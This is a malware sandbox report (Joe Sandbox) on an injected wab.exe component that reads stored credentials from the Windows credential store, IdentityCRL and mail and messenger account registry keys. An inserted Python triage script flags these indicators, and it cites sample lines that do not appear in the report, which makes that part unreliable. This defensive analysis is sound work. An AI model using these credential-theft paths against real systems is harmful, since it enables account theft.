                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                    Control-flow Graph

                    control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                    APIs
                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • memcpy.MSVCRT ref: 0040FBE4
                    • memcpy.MSVCRT ref: 0040FBF9
                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                    • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                    • API String ID: 2768085393-2409096184
                    • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                    • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                    Control-flow Graph

                    control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 255 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->255 253->252 254 444c75-444c7e 253->254 257 444c80-444c85 254->257 258 444c9f-444ca3 254->258 263 444d02-444d0d __setusermatherr 255->263 264 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 255->264 257->252 260 444c8c-444c93 257->260 258->252 261 444ca5-444ca7 258->261 260->252 265 444c95-444c9d 260->265 262 444cad-444cb0 261->262 262->255 263->264 268 444da4-444da7 264->268 269 444d6a-444d72 264->269 265->262 270 444d81-444d85 268->270 271 444da9-444dad 268->271 272 444d74-444d76 269->272 273 444d78-444d7b 269->273 275 444d87-444d89 270->275 276 444d8b-444d9c GetStartupInfoA 270->276 271->268 272->269 272->273 273->270 274 444d7d-444d7e 273->274 274->270 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                    • String ID:
                    • API String ID: 3662548030-0
                    • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                    • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                    • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                    • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0044430B
                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                    • memset.MSVCRT ref: 00444379
                    • memset.MSVCRT ref: 00444394
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                    • strlen.MSVCRT ref: 004443DB
                    • _strcmpi.MSVCRT ref: 00444401
                    Strings
                    • \Microsoft\Windows Mail, xrefs: 00444329
                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                    • Store Root, xrefs: 004443A5
                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                    • API String ID: 832325562-2578778931
                    • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                    • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                    Control-flow Graph

                    control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                    APIs
                    • memset.MSVCRT ref: 0040F567
                    • memset.MSVCRT ref: 0040F57F
                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • memcpy.MSVCRT ref: 0040F652
                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                    • String ID:
                    • API String ID: 2012582556-3916222277
                    • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                    • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                    Control-flow Graph

                    control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                    APIs
                    • memset.MSVCRT ref: 004037EB
                    • memset.MSVCRT ref: 004037FF
                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                      • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    • strchr.MSVCRT ref: 0040386E
                    • _mbscpy.MSVCRT ref: 0040388B
                    • strlen.MSVCRT ref: 00403897
                    • sprintf.MSVCRT ref: 004038B7
                    • _mbscpy.MSVCRT ref: 004038CD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                    • String ID: %s@yahoo.com
                    • API String ID: 317221925-3288273942
                    • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                    • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                    Control-flow Graph

                    control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                    APIs
                    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                    • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadMessageProc
                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                    • API String ID: 2780580303-317687271
                    • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                    • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                    • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                    • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                    Control-flow Graph

                    control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                    APIs
                    • memset.MSVCRT ref: 00403504
                    • memset.MSVCRT ref: 0040351A
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                    • _mbscpy.MSVCRT ref: 00403555
                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                    • _mbscat.MSVCRT ref: 0040356D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscatmemset$Close_mbscpystrlen
                    • String ID: InstallPath$Software\Group Mail$fb.dat
                    • API String ID: 3071782539-966475738
                    • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                    • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                    Control-flow Graph

                    control_flow_graph 374 40f6e2-40f70a call 40466b call 4045db 379 40f710-40f717 call 404734 374->379 380 40f7e9-40f801 call 404656 call 404785 374->380 379->380 385 40f71d-40f72e CredReadA 379->385 385->380 387 40f734-40f73a 385->387 389 40f740-40f743 387->389 390 40f7e5 387->390 389->390 391 40f749-40f759 389->391 390->380 392 40f75a-40f770 391->392 392->392 393 40f772-40f795 call 4047a5 392->393 396 40f7e2 393->396 397 40f797-40f7b6 WideCharToMultiByte 393->397 396->390 398 40f7b8-40f7c6 strlen 397->398 399 40f7d9-40f7dc LocalFree 397->399 398->399 400 40f7c8-40f7d8 _mbscpy 398->400 399->396 400->399
                    APIs
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                    • strlen.MSVCRT ref: 0040F7BE
                    • _mbscpy.MSVCRT ref: 0040F7CF
                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                    • String ID: Passport.Net\*
                    • API String ID: 4000595657-3671122194
                    • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                    • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
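The function summaries above (Thunderbird/Eudora profile lookup, Outlook and Windows Messaging profile keys, the IdentityCRL "Dynamic Salt" value, pstorec.dll/PStoreCreateInstance, CredReadA on "Passport.Net\*") are the credential-recovery component the wab.exe dump carries. The following is an added example, not Joe Sandbox tooling and not code from the analysed sample: it parses lines in this report's "APIs" list format and flags which of those indicator strings a function reaches for. The grouping of indicators into categories is an assumption made here for triage; the sample input lines are copied from this report.

```python
"""Parse Joe Sandbox 'APIs' lines from a memory-dump function summary and flag the
credential-harvesting indicators they contain.  Added example for this report; it is
not Joe Sandbox tooling and not code from the analysed sample."""
import re

# One line of the report's "APIs" list, e.g.
#   • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,...), ref: 0040FB31
#   • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715), ref: 0040473C
#   • memset.MSVCRT ref: 0040F567
API_LINE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<subcall>[0-9A-Fa-f]{8}):\s*)?
        (?P<func>[\w?@$]+)\.(?P<module>\w+)
        (?:\((?P<args>.*)\))?
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$""",
    re.VERBOSE,
)

# Indicator strings taken from the function summaries on this page, grouped (my own
# assumption) by the kind of secret the code path reaches for.  Matching is a
# case-insensitive substring test against the function name and its arguments.
INDICATORS = {
    "credential_store": [
        "credreada", "credenumeratea", "credenumeratew",
        "pstorec.dll", "pstorecreateinstance", r"passport.net\*",
        r"software\microsoft\identitycrl", "dynamic salt",
    ],
    "mail_client": [
        "mozilla thunderbird", r"thunderbird\profiles", r"outlook\profiles",
        "windows messaging subsystem", r"internet account manager\accounts",
        "windows live mail", "store root", r"qualcomm\eudora",
        r"software\group mail", "nss3.dll", "sqlite3.dll",
    ],
    "messenger": [r"google talk\accounts"],
}

# Constructed sample input: API lines copied from the wab.exe dump analysis above.
SAMPLE_LINES = r"""
• RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
• RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
• CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
• memset.MSVCRT ref: 0040F567
"""


def parse_api_line(line):
    """Return {subcall, func, module, args, ref} for one report line, or None."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {
        "subcall": m.group("subcall"),   # address of the called sub-function, or None
        "func": m.group("func"),
        "module": m.group("module"),
        # Arguments are split on commas; none of the report's string arguments contain one.
        "args": [a.strip() for a in args.split(",")] if args else [],
        "ref": m.group("ref").upper(),
    }


def parse_report(text):
    """Parse every API line in a block of report text; non-matching lines are skipped."""
    records = []
    for line in text.splitlines():
        rec = parse_api_line(line)
        if rec:
            records.append(rec)
    return records


def classify(records):
    """Map indicator category -> sorted list of indicator strings seen in the records."""
    hits = {}
    for rec in records:
        haystack = " ".join([rec["func"], rec["module"], *rec["args"]]).lower()
        for category, tokens in INDICATORS.items():
            for token in tokens:
                if token in haystack:
                    hits.setdefault(category, set()).add(token)
    return {cat: sorted(tokens) for cat, tokens in hits.items()}


if __name__ == "__main__":
    recs = parse_report(SAMPLE_LINES)
    for cat, tokens in classify(recs).items():
        print(f"{cat}: {', '.join(tokens)}")
```

Feed it the "APIs" sections of a report and it tells you, per function, whether the code path touches the Windows credential store, a mail client's profile storage, or a messenger account store. The strings alone identify an embedded NirSoft-style mail-credential recovery component, which legitimate administration tools also carry; what makes it malicious in this report is the context around it (the component running inside wab.exe after injection from a PowerShell stage), so use the classification as a triage aid rather than a verdict.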

                    Control-flow Graph

                    control_flow_graph 401 40ccd7-40cd06 ??2@YAPAXI@Z 402 40cd08-40cd0d 401->402 403 40cd0f 401->403 404 40cd11-40cd24 ??2@YAPAXI@Z 402->404 403->404 405 40cd26-40cd2d call 404025 404->405 406 40cd2f 404->406 408 40cd31-40cd57 405->408 406->408 410 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 408->410 411 40cd59-40cd60 DeleteObject 408->411 411->410
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                    • String ID:
                    • API String ID: 2054149589-0
                    • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                    • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    • memset.MSVCRT ref: 00408620
                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                    • memset.MSVCRT ref: 00408671
                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                    Strings
                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                    • String ID: Software\Google\Google Talk\Accounts
                    • API String ID: 1366857005-1079885057
                    • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                    • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                    Control-flow Graph

                    control_flow_graph 441 40ba28-40ba3a 442 40ba87-40ba9b call 406c62 441->442 443 40ba3c-40ba52 call 407e20 _mbsicmp 441->443 465 40ba9d call 4107f1 442->465 466 40ba9d call 404734 442->466 467 40ba9d call 404785 442->467 468 40ba9d call 403c16 442->468 469 40ba9d call 410a9c 442->469 448 40ba54-40ba6d call 407e20 443->448 449 40ba7b-40ba85 443->449 454 40ba74 448->454 455 40ba6f-40ba72 448->455 449->442 449->443 450 40baa0-40bab3 call 407e30 458 40bab5-40bac1 450->458 459 40bafa-40bb09 SetCursor 450->459 457 40ba75-40ba76 call 40b5e5 454->457 455->457 457->449 461 40bac3-40bace 458->461 462 40bad8-40baf7 qsort 458->462 461->462 462->459 465->450 466->450 467->450 468->450 469->450
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: Cursor_mbsicmpqsort
                    • String ID: /nosort$/sort
                    • API String ID: 882979914-1578091866
                    • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                    • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                    APIs
                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                    • memset.MSVCRT ref: 00410E10
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                    • _mbscpy.MSVCRT ref: 00410E87
                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                    • API String ID: 889583718-2036018995
                    • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                    • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                    APIs
                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
